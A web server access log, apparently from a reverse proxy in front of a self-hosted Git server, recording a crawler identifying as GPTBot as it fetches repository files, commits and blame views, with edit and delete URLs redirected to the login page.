+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:32:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/struct.pyc" [Client 74.7.227.38] [Length 305] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/struct.pyc" +[17/Feb/2026:15:32:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 9917] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static/js/app.js" +[17/Feb/2026:15:32:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 25164] [Gzip 12.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static/js/app.js" +[17/Feb/2026:15:32:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 11073] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static/js/app.js" +[17/Feb/2026:15:32:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/struct.pyc" [Client 74.7.227.38] [Length 11065] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/struct.pyc" +[17/Feb/2026:15:32:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 9936] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python" +[17/Feb/2026:15:32:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 9983] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python" +[17/Feb/2026:15:32:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 7] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python" +[17/Feb/2026:15:32:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 10414] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/uvicorn" +[17/Feb/2026:15:32:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 9936] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/uvicorn" +[17/Feb/2026:15:32:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate.csh" +[17/Feb/2026:15:32:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 255] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/uvicorn" +[17/Feb/2026:15:32:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 11405] [Gzip 4.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate.csh" +[17/Feb/2026:15:32:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/base_library.zip" [Client 74.7.227.38] [Length 2814905] [Gzip 25.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/base_library.zip" +[17/Feb/2026:15:32:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/base_library.zip" [Client 74.7.227.38] [Length 9930] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/base_library.zip" +[17/Feb/2026:15:32:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/start.sh?display=rendered" [Client 74.7.227.38] [Length 10970] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/start.sh" +[17/Feb/2026:15:32:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates/index.html?display=source" [Client 74.7.227.38] [Length 16461] [Gzip 5.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates/index.html" +[17/Feb/2026:15:32:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates/index.html?display=rendered" [Client 74.7.227.38] [Length 10978] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates/index.html" +[17/Feb/2026:15:32:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/QUICKSTART.md?display=rendered" [Client 74.7.227.38] [Length 12769] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/QUICKSTART.md" +[17/Feb/2026:15:32:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 9920] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/4.conf" +[17/Feb/2026:15:32:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 9947] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/2.conf" +[17/Feb/2026:15:32:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 9920] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/3.conf" +[17/Feb/2026:15:32:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 9920] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/1.conf" +[17/Feb/2026:15:32:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 9947] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/4.conf" +[17/Feb/2026:15:32:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 9946] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/1.conf" +[17/Feb/2026:15:33:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 9920] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/2.conf" +[17/Feb/2026:15:33:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 10139] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/3.conf" +[17/Feb/2026:15:33:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fstatus.json" [Client 74.7.227.38] [Length 22620] [Gzip 3.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/status.json" +[17/Feb/2026:15:33:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" [Client 74.7.227.38] [Length 11381] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0" +[17/Feb/2026:15:33:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/components/ChatBot.tsx" +[17/Feb/2026:15:33:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/components/ChatBot.tsx" +[17/Feb/2026:15:33:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/components/Contact.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/components/Contact.tsx" +[17/Feb/2026:15:33:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/components/Contact.tsx" +[17/Feb/2026:15:33:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/App.tsx" [Client 74.7.227.38] [Length 12976] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html" +[17/Feb/2026:15:33:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest?display=rendered" [Client 74.7.227.38] [Length 11662] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest" +[17/Feb/2026:15:33:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest?display=rendered" [Client 74.7.227.38] [Length 11663] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest" +[17/Feb/2026:15:33:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest?display=rendered" [Client 74.7.227.38] [Length 11661] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest" +[17/Feb/2026:15:33:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest?display=rendered" [Client 74.7.227.38] [Length 11660] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest" +[17/Feb/2026:15:33:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest?display=rendered" [Client 74.7.227.38] [Length 11661] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest" +[17/Feb/2026:15:33:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest?display=rendered" [Client 74.7.227.38] [Length 11654] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest" +[17/Feb/2026:15:33:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.2?display=rendered" [Client 74.7.227.38] [Length 10996] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.2" +[17/Feb/2026:15:33:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" [Client 74.7.227.38] [Length 10432] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" +[17/Feb/2026:15:33:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" [Client 74.7.227.38] [Length 9920] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" +[17/Feb/2026:15:33:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" [Client 74.7.227.38] [Length 287] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" +[17/Feb/2026:15:33:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-2.conf?display=source" [Client 74.7.227.38] [Length 11683] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-2.conf" +[17/Feb/2026:15:33:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/App.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/App.tsx" +[17/Feb/2026:15:33:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/App.tsx" +[17/Feb/2026:15:33:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/App.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/App.tsx" +[17/Feb/2026:15:33:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/App.tsx" +[17/Feb/2026:15:33:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/html/App.tsx" [Client 74.7.227.38] [Length 12706] [Gzip 5.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/App.tsx" +[17/Feb/2026:15:33:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/App.tsx" [Client 74.7.227.38] [Length 800] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/App.tsx" +[17/Feb/2026:15:33:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/App.tsx" [Client 74.7.227.38] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/App.tsx" +[17/Feb/2026:15:33:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.5?display=rendered" [Client 74.7.227.38] [Length 10995] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.5" +[17/Feb/2026:15:33:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.7?display=rendered" [Client 74.7.227.38] [Length 10927] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 